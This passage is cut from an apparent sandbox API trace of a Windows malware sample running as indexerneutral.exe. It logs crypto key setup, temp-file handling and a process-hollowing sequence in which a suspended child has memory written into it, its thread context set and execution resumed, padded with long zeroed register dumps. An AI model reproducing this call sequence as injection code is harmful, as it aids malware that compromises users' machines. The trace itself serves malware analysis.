pbData=0x501d08, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x12291d4 | out: phKey=0x12291d4*=0x512ba8) returned 1 [0248.668] LocalFree (hMem=0x501d08) returned 0x0 [0248.668] CryptGenKey (in: hProv=0x52c980, Algid=0x660e, dwFlags=0x1, phKey=0x12291d8 | out: phKey=0x12291d8*=0x513028) returned 1 [0248.668] CryptCreateHash (in: hProv=0x52c980, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x12291dc | out: phHash=0x12291dc) returned 1 [0248.671] VirtualAlloc (lpAddress=0x0, dwSize=0x5b000, flAllocationType=0x3000, flProtect=0x40) returned 0x1ae0000 [0248.674] WTSGetActiveConsoleSessionId () returned 0x1 [0248.674] QueryUserToken () returned 0x0 [0249.780] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x175fd20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0249.780] _snwprintf (in: _Dest=0x175fb18, _Count=0x104, _Format="\"%s\" /scomma \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\2ECB.tmp\"") returned 75 [0249.781] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\2ECB.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x175faac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x175ff2c | out: lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\2ECB.tmp\"", lpProcessInformation=0x175ff2c*(hProcess=0x3d4, hThread=0x3d0, dwProcessId=0x7f0, dwThreadId=0x7f4)) returned 1 [0249.785] VirtualQueryEx (in: hProcess=0x3d4, lpAddress=0x400000, lpBuffer=0x175fad8, dwLength=0x1c | out: lpBuffer=0x175fad8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0249.785] VirtualProtectEx (in: hProcess=0x3d4, lpAddress=0x400000, dwSize=0x5b000, flNewProtect=0x40, lpflOldProtect=0x175faf4 | out: lpflOldProtect=0x175faf4*=0x2) returned 1 [0249.786] GetThreadContext (in: hThread=0x3d0, lpContext=0x175f80c | out: lpContext=0x175f80c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0249.977] IsWow64Process (in: hProcess=0x3d4, Wow64Process=0x175faf8 | out: Wow64Process=0x175faf8) returned 1 [0249.977] WriteProcessMemory (in: hProcess=0x3d4, lpBaseAddress=0x400000, lpBuffer=0x1ae0000*, nSize=0x5b000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1ae0000*, lpNumberOfBytesWritten=0x0) returned 1 [0250.160] WriteProcessMemory (in: hProcess=0x3d4, lpBaseAddress=0x7ffde008, lpBuffer=0x175fafc*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x175fafc*, lpNumberOfBytesWritten=0x0) returned 1 [0250.161] WriteProcessMemory (in: hProcess=0x3d4, lpBaseAddress=0x7ffdf010, lpBuffer=0x175fafc*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x175fafc*, lpNumberOfBytesWritten=0x0) returned 1 [0250.161] SetThreadContext (hThread=0x3d0, lpContext=0x175f80c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x443a06, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0250.309] ResumeThread (hThread=0x3d0) returned 0x1 [0250.309] WaitForSingleObject (hHandle=0x3d4, dwMilliseconds=0xea60) returned 0x0 [0255.075] TerminateProcess (hProcess=0x3d4, uExitCode=0x0) returned 0 [0255.076] CloseHandle (hObject=0x3d4) returned 1 [0255.076] CloseHandle (hObject=0x3d0) returned 1 [0255.076] CloseHandle (hObject=0x0) returned 0 [0255.076] VirtualFree (lpAddress=0x1ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0255.077] CreateFileW (lpFileName="C:\\Windows\\TEMP\\2ECB.tmp" (normalized: "c:\\windows\\temp\\2ecb.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0 [0255.077] GetFileSize (in: hFile=0x3d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70 [0255.077] CloseHandle (hObject=0x3d0) returned 1 [0255.078] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\2ECB.tmp" (normalized: "c:\\windows\\temp\\2ecb.tmp")) returned 1 [0255.078] CryptDestroyHash (hHash=0x512ca8) returned 1 [0255.078] CryptDestroyKey (hKey=0x513028) returned 1 [0255.078] CryptDestroyKey (hKey=0x512ba8) returned 1 [0255.078] CryptReleaseContext (hProv=0x52c980, dwFlags=0x0) returned 1 [0255.078] FreeLibrary (hLibModule=0x760f0000) returned 1 [0255.078] FreeLibrary (hLibModule=0x77130000) returned 1 [0255.078] FreeLibrary (hLibModule=0x74790000) returned 1 [0255.079] FreeLibrary (hLibModule=0x74450000) returned 1 [0255.079] FreeLibrary (hLibModule=0x74160000) returned 1 [0255.079] FreeLibrary (hLibModule=0x73f30000) returned 1 [0255.079] FreeLibrary (hLibModule=0x73f20000) returned 1 [0255.079] CloseHandle (hObject=0x364) returned 1 Thread: id = 508 os_tid = 0x7c8 [0249.578] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0249.578] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0249.578] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x77130000 [0249.579] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x74790000 [0249.579] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x74450000 [0249.579] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74160000 [0249.579] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x73f30000 [0249.580] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x73f20000 [0249.580] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x129d2b0 | out: lpBuffer="C:\\Windows\\TEMP\\") returned 0x10 [0249.580] GetTempFileNameW (in: lpPathName="C:\\Windows\\TEMP\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x129d2b0 | out: lpTempFileName="C:\\Windows\\TEMP\\3256.tmp" (normalized: "c:\\windows\\temp\\3256.tmp")) returned 0x3256 [0249.580] DeleteFileW (lpFileName="C:\\Windows\\TEMP\\3256.tmp" (normalized: "c:\\windows\\temp\\3256.tmp")) returned 1 [0249.581] CryptAcquireContextW (in: phProv=0x129d4e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x129d4e0*=0x5066b0) returned 1 [0249.581] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x185ff14, pcbStructInfo=0x185ff10 | out: pvStructInfo=0x185ff14, pcbStructInfo=0x185ff10) returned 1 [0249.581] CryptImportKey (in: hProv=0x5066b0, pbData=0x501708, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x129d4e4 | out: phKey=0x129d4e4*=0x5139e8) returned 1 [0249.581] LocalFree (hMem=0x501708) returned 0x0 [0249.581] CryptGenKey (in: hProv=0x5066b0, Algid=0x660e, dwFlags=0x1, phKey=0x129d4e8 | out: phKey=0x129d4e8*=0x5138a8) returned 1 [0249.581] CryptCreateHash (in: hProv=0x5066b0, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x129d4ec | out: phHash=0x129d4ec) returned 1 [0249.582] VirtualAlloc (lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x12a0000 [0249.583] WTSGetActiveConsoleSessionId () returned 0x1 [0249.583] QueryUserToken () returned 0x0 [0249.585] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x185fd20, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0249.585] _snwprintf (in: _Dest=0x185fb18, _Count=0x104, _Format="\"%s\" /scomma \"%s\"" | out: _Dest="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\3256.tmp\"") returned 75 [0249.585] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" /scomma \"C:\\Windows\\TEMP\\3256.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x404, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x185faac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, 